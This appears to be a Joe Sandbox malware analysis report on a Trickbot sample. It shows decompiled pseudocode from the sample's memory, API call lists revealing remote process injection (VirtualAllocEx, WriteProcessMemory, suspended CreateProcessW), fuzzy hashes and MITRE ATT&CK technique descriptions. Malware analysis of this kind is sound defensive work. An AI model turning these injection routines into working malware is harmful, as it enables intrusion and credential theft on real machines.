Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 48437c20bfa14282d3a61321f637a54bcbb1c22c030d1d8826baed652006ac8a
Instruction ID: ffdcc4305e91678586e7bf98f9917c42535e68cecacd5866e42794e812ccbb9b
Opcode Fuzzy Hash: 48437c20bfa14282d3a61321f637a54bcbb1c22c030d1d8826baed652006ac8a
Instruction Fuzzy Hash: 7801DDB190151477D322A7217C46FBF35ADBF97701F050018FB08D6291EB184705C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 006F5C10, Relevance: 6.3, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E006F5C10(void* __ecx, void* __eflags) {
				void* _t18;
				void* _t20;
				void* _t21;
				int _t24;
				void* _t32;

				_t32 = __ecx;
				if(E006E1F50(_t18, __ecx) != 0) {
					E006EDCC0(__ecx,  *((intOrPtr*)(__ecx + 0x44)));
				}
				_t20 =  *(_t32 + 0x70);
				if(_t20 != 0) {
					CloseHandle(_t20);
					 *(_t32 + 0x70) = 0;
				}
				_t21 =  *(_t32 + 0x74);
				if(_t21 != 0) {
					CloseHandle(_t21);
					 *(_t32 + 0x74) = 0;
				}
				 *((intOrPtr*)(_t32 + 0x80)) = 0;
				 *((intOrPtr*)(_t32 + 0x44)) = 0;
				 *((intOrPtr*)(_t32 + 0x94)) = 0;
				 *((intOrPtr*)(_t32 + 0x98)) = 0;
				 *((intOrPtr*)(_t32 + 0x7c)) = 0;
				 *((intOrPtr*)(_t32 + 0x78)) = 0;
				CloseHandle( *(_t32 + 0x88));
				 *(_t32 + 0x88) = 0;
				CloseHandle( *(_t32 + 0x8c));
				 *(_t32 + 0x8c) = 0;
				_t24 = CloseHandle( *(_t32 + 0x90));
				 *(_t32 + 0x90) = 0;
				return _t24;
			}

0x006f5c13
0x006f5c1c
0x006f5c23
0x006f5c23
0x006f5c28
0x006f5c2d
0x006f5c30
0x006f5c36
0x006f5c36
0x006f5c3d
0x006f5c42
0x006f5c45
0x006f5c4b
0x006f5c4b
0x006f5c5a
0x006f5c60
0x006f5c63
0x006f5c69
0x006f5c6f
0x006f5c72
0x006f5c7b
0x006f5c7d
0x006f5c89
0x006f5c8b
0x006f5c97
0x006f5c99
0x006f5ca2

APIs

Part of subcall function 006E1F50: GetExitCodeThread.KERNEL32(?,?,?,?,006E391B), ref: 006E1F6A

CloseHandle.KERNEL32(?), ref: 006F5C30
CloseHandle.KERNEL32(?), ref: 006F5C45
CloseHandle.KERNEL32(?), ref: 006F5C7B
CloseHandle.KERNEL32(?), ref: 006F5C89
CloseHandle.KERNEL32(?), ref: 006F5C97

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CloseHandle$CodeExitThread
String ID:
API String ID: 1430014291-0
Opcode ID: 177d15090ac1c2dd22a9481651a629274e8492a079f642c5dc41aaaf983f5d4d
Instruction ID: 1778d2231b92216188f8e18a2ebeda452a4f9230dff66d6b781e4569fdb35ef1
Opcode Fuzzy Hash: 177d15090ac1c2dd22a9481651a629274e8492a079f642c5dc41aaaf983f5d4d
Instruction Fuzzy Hash: 5D019770500B409BD7319F36D944B57FEE9FF94740F40881E92AAC2660CB71A804DB60

Uniqueness

Uniqueness Score: -1.00%

Function 006F0300, Relevance: 6.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E006F0300(intOrPtr* __ecx, void* __edx) {
				void* _t14;
				void* _t28;
				signed int _t30;
				void* _t33;
				signed int _t34;
				void* _t35;
				intOrPtr* _t37;
				signed int _t38;
				intOrPtr* _t39;
				void* _t40;
				signed int* _t41;

				_t33 = __edx;
				_t34 = 0;
				_t37 = __ecx;
				 *_t39 = 0;
				 *0x6f9d54(0x6f9bbc);
				_t43 =  *__ecx;
				if( *__ecx != 0) {
					while(1) {
						_t1 = _t37 + 4; // 0x0
						if(E006F5020( *((intOrPtr*)( *_t1 + _t34 * 4)), _t43, 0) == 0) {
							break;
						}
						_t34 = _t34 + 1;
						if(_t34 <  *_t37) {
							continue;
						}
						goto L3;
					}
					 *0x6f9d9c(0x6f9bbc);
					__eflags = 0;
					return 0;
				}
				L3:
				 *0x6f9d9c(0x6f9bbc);
				_t35 = _t39 + 4;
				E006F4520(_t35, 0x24);
				_t40 = _t39 + 8;
				_push(_t40);
				_push(_t35);
				_t14 = E006ED4B0();
				_t41 = _t40 + 8;
				_t28 = _t14;
				if(_t28 != 0) {
					_t30 =  *_t41;
					if(_t30 <= 0) {
						while(1) {
							L9:
							_t17 = _t30 - 1;
							 *_t41 = _t30 - 1;
							if(_t30 == 0) {
								break;
							}
							E006E91E0( *((intOrPtr*)(_t28 + _t17 * 4)));
							_t41 =  &(_t41[1]);
							_t30 =  *_t41;
						}
						E006E91E0(_t28);
						return 1;
					}
					_t38 = 0;
					do {
						E006E6570(_t37, _t33, 0, PathFindFileNameW( *(_t28 + _t38 * 4)));
						_t30 =  *_t41;
						_t38 = _t38 + 1;
					} while (_t38 < _t30);
					goto L9;
				}
				return 1;
			}

0x006f0300
0x006f030a
0x006f030c
0x006f030e
0x006f0316
0x006f031c
0x006f031e
0x006f0320
0x006f0320
0x006f032f
0x00000000
0x00000000
0x006f0335
0x006f0338
0x00000000
0x00000000
0x00000000
0x006f0338
0x006f03ba
0x006f03c0
0x00000000
0x006f03c0
0x006f033a
0x006f033f
0x006f0345
0x006f034c
0x006f0351
0x006f0356
0x006f0357
0x006f0358
0x006f035d
0x006f0360
0x006f0367
0x006f0369
0x006f036e
0x006f039d
0x006f039d
0x006f039d
0x006f03a2
0x006f03a5
0x00000000
0x00000000
0x006f0392
0x006f0397
0x006f039a
0x006f039a
0x006f03a8
0x00000000
0x006f03b2
0x006f0376
0x006f0378
0x006f0380
0x006f0385
0x006f0388
0x006f0389
0x00000000
0x006f038d
0x006f03cc

APIs

RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F0316
RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F033F
PathFindFileNameW.SHLWAPI(00000000), ref: 006F037B

Part of subcall function 006F5020: GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006F5064

RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F03BA

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CriticalSection$LeaveNamePath$EnterFileFindFull
String ID:
API String ID: 133812498-0
Opcode ID: e71b6d6d018ba70e47a14480c0c90cb9507c2932c8150882f77fb01b194301c7
Instruction ID: 29eb0d4e84b67b7378758be4075c11a3611a8c7f079cbd7ec43042a17c00f9d9
Opcode Fuzzy Hash: e71b6d6d018ba70e47a14480c0c90cb9507c2932c8150882f77fb01b194301c7
Instruction Fuzzy Hash: 3611B77270530A9BEB10BF65EC8AA3E77E7DF80745F01042CE689C7292EA719801C766

Uniqueness

Uniqueness Score: -1.00%

Function 006E6740, Relevance: 6.1, APIs: 4, Instructions: 71
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E006E6740(void* __ecx, void* __eflags, intOrPtr _a4) {
				char _v212;
				char _v312;
				char _v316;
				WCHAR* _v320;
				_Unknown_base(*)()* _t16;
				void* _t21;
				void* _t24;
				CHAR* _t28;
				void* _t29;
				WCHAR* _t31;
				_Unknown_base(*)()* _t32;
				void* _t33;
				void* _t34;
				void* _t36;

				_t33 = __ecx;
				_t31 =  &_v212;
				_v320 = 0;
				_v316 = 0;
				E006F4520(_t31, 0x56);
				_t28 =  &_v312;
				E006F7160(_t28, 0x57);
				_t36 = _t34 + 0x10;
				_t16 = GetProcAddress(GetModuleHandleW(_t31), _t28);
				if(_t16 != 0) {
					_t32 = _t16;
					_t21 = E006EC380(_a4, 0, _t36, 0xffffffff);
					_t36 = _t36 + 0x10;
					if(_t21 != 0) {
						_t24 = E006E9CD0(lstrlenW(_v320) + _t22 + 2,  *(_t33 + 0x70), _v320, lstrlenW(_v320) + _t22 + 2);
						_t36 = _t36 + 0xc;
						if(_t24 != 0) {
							_t29 = _t24;
							_push(_t29);
							_push( &_v316);
							_push(1);
							_push(_t32);
							_push(_t33);
							E006F3FA0();
							_t36 = _t36 + 0x14;
							VirtualFreeEx( *(_t33 + 0x70), _t29, 0, 0x8000);
						}
					}
				}
				_t17 = _v320;
				if(_v320 != 0) {
					E006E91E0(_t17);
				}
				return _v316;
			}

0x006e674b
0x006e674d
0x006e6751
0x006e6754
0x006e675b
0x006e6763
0x006e676a
0x006e676f
0x006e677b
0x006e6783
0x006e6785
0x006e6795
0x006e679a
0x006e679f
0x006e67b6
0x006e67bb
0x006e67c0
0x006e67c2
0x006e67c8
0x006e67c9
0x006e67ca
0x006e67cc
0x006e67cd
0x006e67ce
0x006e67d3
0x006e67e1
0x006e67e1
0x006e67c0
0x006e679f
0x006e67e7
0x006e67ec
0x006e67ef
0x006e67f4
0x006e6804

APIs

GetModuleHandleW.KERNEL32(?), ref: 006E6773
GetProcAddress.KERNEL32(00000000,?), ref: 006E677B

Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,006E8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 006EC396
Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 006EC3C4

lstrlenW.KERNEL32 ref: 006E67A4

Part of subcall function 006E9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
Part of subcall function 006E9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07

Part of subcall function 006F3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 006F3FCD
Part of subcall function 006F3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 006F4070
Part of subcall function 006F3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 006F4095

VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 006E67E1

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: MemoryProcessVirtual$AllocByteCharMultiWideWrite$AddressFreeHandleModuleProcReadlstrlen
String ID:
API String ID: 2912094857-0
Opcode ID: 5c66d289c4fe33498632a4de359206971ad0ca5e50136678f7c28c8239823433
Instruction ID: 289c5b0603f56d45f4b82ae89cac350d0b2f025dabe59f67b399ebbabdb80993
Opcode Fuzzy Hash: 5c66d289c4fe33498632a4de359206971ad0ca5e50136678f7c28c8239823433
Instruction Fuzzy Hash: 9511B4B6A053007BE711AB35EC4AFBB76AEEF40745F04042CFA44C1291EA31D914CA62

Uniqueness

Uniqueness Score: -1.00%

Function 006F3100, Relevance: 6.1, APIs: 4, Instructions: 62
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E006F3100(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v212;
				char _v312;
				_Unknown_base(*)()* _t10;
				void* _t17;
				CHAR* _t18;
				_Unknown_base(*)()* _t19;
				WCHAR* _t21;
				void* _t22;
				void* _t23;
				long* _t24;
				long* _t26;

				_t23 = __ecx;
				 *_t24 = 0;
				_t21 =  &_v212;
				E006F4520(_t21, 0x56);
				_t18 =  &_v312;
				E006F7160(_t18, 0x9b);
				_t26 =  &(_t24[4]);
				_t10 = GetProcAddress(GetModuleHandleW(_t21), _t18);
				if(_t10 == 0) {
					L7:
					return  *_t26;
				}
				_t22 = _a8;
				_t19 = _t10;
				if(_t22 >= 0x10000) {
					_push(_t22);
					_t17 = E006E9CD0( *0x6f9d28() + 1,  *(_t23 + 0x70), _t22,  *0x6f9d28() + 1);
					_t26 =  &(_t26[3]);
					_t22 = _t17;
				}
				if(_t22 != 0) {
					_push(_t22);
					_push(_a4);
					_push(_t26);
					_push(2);
					_push(_t19);
					_push(_t23);
					E006F3FA0();
					_t26 =  &(_t26[6]);
					if(_t22 >= 0x10000 && _t22 != 0) {
						VirtualFreeEx( *(_t23 + 0x70), _t22, 0, 0x8000);
					}
				}
				goto L7;
			}

0x006f3109
0x006f310b
0x006f3112
0x006f3119
0x006f3121
0x006f312b
0x006f3130
0x006f313c
0x006f3144
0x006f31a6
0x006f31b2
0x006f31b2
0x006f3146
0x006f314d
0x006f3155
0x006f3157
0x006f3164
0x006f3169
0x006f316c
0x006f316c
0x006f3170
0x006f3174
0x006f3175
0x006f317c
0x006f317d
0x006f317f
0x006f3180
0x006f3181
0x006f3186
0x006f318f
0x006f31a0
0x006f31a0
0x006f318f
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 006F3134
GetProcAddress.KERNEL32(00000000,?), ref: 006F313C
lstrlen.KERNEL32(?), ref: 006F3158

Part of subcall function 006E9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
Part of subcall function 006E9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006F31A0

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Virtual$AddressAllocFreeHandleMemoryModuleProcProcessWritelstrlen
String ID:
API String ID: 2409309907-0
Opcode ID: 3fad7bc83337b975d4907d73e7d4795dc12ac38ff7e6f61aca7b5fb90ef1920a
Instruction ID: ce1b2343b1158a6f232450a7adfecd7f66565a561848f24f733a1cd82b0e6834
Opcode Fuzzy Hash: 3fad7bc83337b975d4907d73e7d4795dc12ac38ff7e6f61aca7b5fb90ef1920a
Instruction Fuzzy Hash: 01110872A006047BE721A724EC49FBB76BFDFC5B41F140418F64882351EA354945C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 006E7440, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006E7440(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				char _v216;
				intOrPtr _v220;
				signed int _v224;
				WCHAR* _v228;
				intOrPtr _v232;
				intOrPtr _v244;
				char _v248;
				struct _STARTUPINFOW _v316;
				signed int _v320;
				long _t42;
				WCHAR* _t43;
				int _t46;
				signed int _t51;
				intOrPtr _t54;
				signed int _t56;
				signed int _t63;
				signed int _t64;
				struct _PROCESS_INFORMATION* _t65;
				intOrPtr _t69;
				char* _t72;
				signed int _t73;
				short _t74;
				signed int _t75;
				void* _t77;
				intOrPtr* _t79;

				_t69 = __ecx;
				_t72 =  &(_v316.lpReserved);
				E006F6610(_t72, 0, 0x128);
				 *((intOrPtr*)(_t72 - 4)) = 0x44;
				GetStartupInfoW( &_v316);
				E006F4520( &_v216, 0x55);
				_t79 = _t77 + 0x14;
				_t42 = 4;
				_t51 = 0;
				while( *((short*)(_t79 + 0x6c + _t51 * 2)) != 0) {
					_t51 = _t51 + 1;
					_t42 = _t42 + 2;
					if(_t51 != 0x7fffffff) {
						continue;
					} else {
						_v224 = 0;
						_v220 = 0x80070057;
						L18:
						_t43 = _v228;
						L19:
						if(_t43 != 0) {
							E006E91E0(_t43);
						}
						return _v232;
					}
				}
				_v224 = _t51;
				_v220 = 0;
				_t43 = E006E3180(_t42, 0);
				_t79 = _t79 + 8;
				__eflags = _t43;
				_v228 = _t43;
				if(_t43 == 0) {
					goto L19;
				}
				_t63 = _v224;
				__eflags = _t63 + 2;
				if(__eflags <= 0) {
					_t54 = 0x80070057;
					if(__eflags != 0) {
						 *_t43 = 0;
					}
					L14:
					_v220 = _t54;
					goto L18;
				}
				_v320 = _t63;
				 *_t79 = _t69;
				_t64 =  ~_t63;
				_t73 = 0;
				_t56 =  ~_t43;
				__eflags = 1;
				while(1) {
					_t74 =  *(_t79 + 0x6c + _t73 * 2) & 0x0000ffff;
					__eflags = _t74;
					if(_t74 == 0) {
						break;
					}
					_t43[_t73] = _t74;
					_t56 = _t56 + 0xfffffffe;
					_t22 = _t73 + 1; // 0x1
					_t75 = _t22;
					__eflags = _t64 + _t73 - 1;
					if(_t64 + _t73 == 1) {
						L10:
						__eflags = _t75 - _v320 - 2;
						_t62 =  ==  ? 0xfffffffe - _t56 :  ~_t56;
						 *((short*)( ==  ? 0xfffffffe - _t56 :  ~_t56)) = 0;
						_t54 = 0x8007007a;
						if(_t75 - _v320 == 2) {
							goto L14;
						}
						L16:
						_t65 =  &_v248;
						 *((intOrPtr*)(_t65 + 0x1c)) = 0;
						_t46 = CreateProcessW(0, _t43, 0, 0, 0, 4, 0, 0,  &_v316, _t65);
						__eflags = _t46;
						if(_t46 != 0) {
							 *_a4 = _v248;
							 *_a8 = _v244;
							_v232 = 1;
							 *((intOrPtr*)( *_t79 + 0x78)) = 1;
						}
						goto L18;
					}
					__eflags = _t73 - 0x7ffffffd;
					_t73 = _t75;
					if(__eflags != 0) {
						continue;
					}
					goto L10;
				}
				_t43[_t73] = 0;
				goto L16;
			}

0x006e744a
0x006e744c
0x006e7458
0x006e7464
0x006e746c
0x006e7479
0x006e747e
0x006e7481
0x006e7486
0x006e7488
0x006e7490
0x006e7491
0x006e749a
0x00000000
0x006e749c
0x006e749c
0x006e74a4
0x006e7592
0x006e7592
0x006e7596
0x006e7598
0x006e759b
0x006e75a0
0x006e75b1
0x006e75b1
0x006e749a
0x006e74b1
0x006e74b7
0x006e74bd
0x006e74c2
0x006e74c5
0x006e74c7
0x006e74cb
0x00000000
0x00000000
0x006e74d1
0x006e74d8
0x006e74da
0x006e7534
0x006e7539
0x006e753b
0x006e753b
0x006e7540
0x006e7540
0x00000000
0x006e7540
0x006e74de
0x006e74e2
0x006e74e5
0x006e74e7
0x006e74e9
0x006e74ed
0x006e74ee
0x006e74ee
0x006e74f3
0x006e74f6
0x00000000
0x00000000
0x006e74fb
0x006e74ff
0x006e7502
0x006e7502
0x006e7505
0x006e7507
0x006e7513
0x006e7520
0x006e7523
0x006e7526
0x006e752b
0x006e7530
0x00000000
0x00000000
0x006e754c
0x006e754c
0x006e7552
0x006e7564
0x006e756a
0x006e756c
0x006e7579
0x006e7586
0x006e758b
0x006e758f
0x006e758f
0x00000000
0x006e756c
0x006e7509
0x006e750f
0x006e7511
0x00000000
0x00000000
0x00000000
0x006e7511
0x006e7546
0x00000000

APIs

GetStartupInfoW.KERNEL32(?), ref: 006E746C
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 006E7564

Strings

W, xrefs: 006E74A4

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CreateInfoProcessStartup
String ID: W
API String ID: 525363069-655174618
Opcode ID: 135f1c579ff5fea9cc7e54e6f06a32f9df0c8e19d58b37006652722ed6182079
Instruction ID: 6136d0fad03c1a325530789730ecf6a0d07f9fc3923af603fe266b39ad94db77
Opcode Fuzzy Hash: 135f1c579ff5fea9cc7e54e6f06a32f9df0c8e19d58b37006652722ed6182079
Instruction Fuzzy Hash: B641E0B15093409FE728DF25D845AABB7EAEF80310F108A1DF5968B390EB75D905CB92

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Authentication logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Utilities such as at and schtasks , along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.
Tactics:	Execution
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas` . Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Kernel drivers, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	### Windows
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

